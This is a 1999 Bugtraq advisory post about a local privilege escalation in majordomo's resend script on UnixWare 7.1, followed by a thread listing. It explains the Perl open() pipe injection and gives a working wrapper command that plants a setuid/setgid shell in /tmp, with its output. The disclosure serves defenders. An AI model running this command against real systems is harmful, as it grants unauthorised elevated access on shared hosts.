Bugtraq mailing list archives
majordomo local exploit
From: btellier () USA NET (Brock Tellier)
Date: Tue, 28 Dec 1999 20:47:44 CST
OVERVIEW A vulnerability in majordomo allows local users to gain elevated privileges. BACKGROUND I've only tested the version of majordomo which comes with UnixWare 7.1 which is 1.94.4. This vulnerability may or not still be present in newer versions of majordomo, but it exists on the default UW7.1 installation. Thanks to rain.forest.puppy for his paper on how to exploit CGI/perl scripts, as it helped me out in this exploit. Grab it at http://www.wiretrip.net/rfp/p/doc.asp?id=6&iface=2 DETAILS The majordomo wrapper allows users to run programs in the /usr/local/majordomo directory with the uid of owner and the gid of daemon. The permissions for wrapper are: -rwsr-xr-x 1 root daemon 6464 Jan 4 1999 /usr/local/majordomo/wrapper but wrapper immediatly setuid()'s and setgid()'s to owner:daemon before execing the wrapped program. A vulnerability in "/usr/local/majordomo/resend" will allow us to execute arbitrary commands with our elevated privileges. The following code snippet appears in resend, a perl script: -snip- # If the first argument is "@filename", read the real arguments # from "filename", and shove them onto the ARGV for later processing # by &Getopts() # if ($ARGV[0] =~ /^\@/) { $fn = shift(@ARGV); $fn =~ s/^@//; open(AV, $fn) || die("open(AV, \"$fn\"): $!\nStopped"); -snip- As you can see, if our first argument to resend starts with a "@", resend will attempt to open() the filename. However, open() can also be used to run programs if the first argument to open() begins with a pipe "|". If our first argument is "@|id", resend will run the program "id" with full privileges. EXPLOIT Our exploit is simple: bash-2.02$ /usr/local/majordomo/wrapper resend '@|cp /bin/ksh /tmp/xnec;chmod 6555 /tmp/xnec' resend: must specify '-l list' at /usr/local/majordomo/resend line 77. bash-2.02$ ls -la /tmp/xnec -r-sr-sr-x 1 owner daemon 361688 Dec 29 06:26 /tmp/xnec Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- Local / Remote Remote DoS Attack in Rover POP3 Server V1.1 NT From aVirt Ussr Labs (Dec 27)
- Remote DoS/Access Attack in Internet Anywhere Mail Server(POP 3) v2.3.1 Steven Alexander (Dec 27)
- Trend Micro InterScan VirusWall SMTP bug asl () USA ALCATEL COM (Dec 27)
- L0pht Advisory: initscripts-4.48-1 RedHat Linux 6.1 Mudge (Dec 27)
- UnixWare local pis exploit Brock Tellier (Dec 27)
- Third Party Software Affected by IIS "Escape Character Parsing" V ulnerability Microsoft Product Security Response Team (Dec 28)
- majordomo local exploit Brock Tellier (Dec 28)
- $cf Security flaw Shevek (Dec 02)
- Re: majordomo local exploit Christopher Schulte (Dec 28)
- Re: majordomo local exploit Todd C. Miller (Dec 28)
- AltaVista rudi carell (Dec 29)
- Re: majordomo local exploit Taneli Huuskonen (Dec 29)
- Re: majordomo local exploit Coolio (Dec 29)
- Re: majordomo local exploit Henrik Edlund (Dec 29)
- bna,sh Loneguard (Dec 30)
- Re: majordomo local exploit Andrew Brown (Dec 30)
- Re: majordomo local exploit Henrik Nordstrom (Dec 30)